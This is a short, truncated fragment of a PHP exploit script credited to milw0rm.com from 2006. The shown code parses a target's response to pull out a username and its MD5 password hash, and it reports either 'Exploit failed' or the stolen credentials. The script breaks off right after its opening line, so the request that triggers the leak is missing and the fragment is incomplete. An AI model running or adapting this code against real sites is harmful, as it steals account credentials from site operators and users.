#!/usr/bin/php ",$gdata[1]); $hash = $ghash[0]; $uname = explode("'",$hash); $uname = explode("::",$uname[1]); $username = $uname[0]; $fhash = explode("::",$hash); $fhash = explode("',picture_sort=100",$fhash[1]); $finalhash = $fhash[0]; if(strlen($finalhash) != 32){ die("Exploit failed..\n"); }else{ die("Username: $username MD5: $finalhash\n"); } } ?> # milw0rm.com [2006-10-27]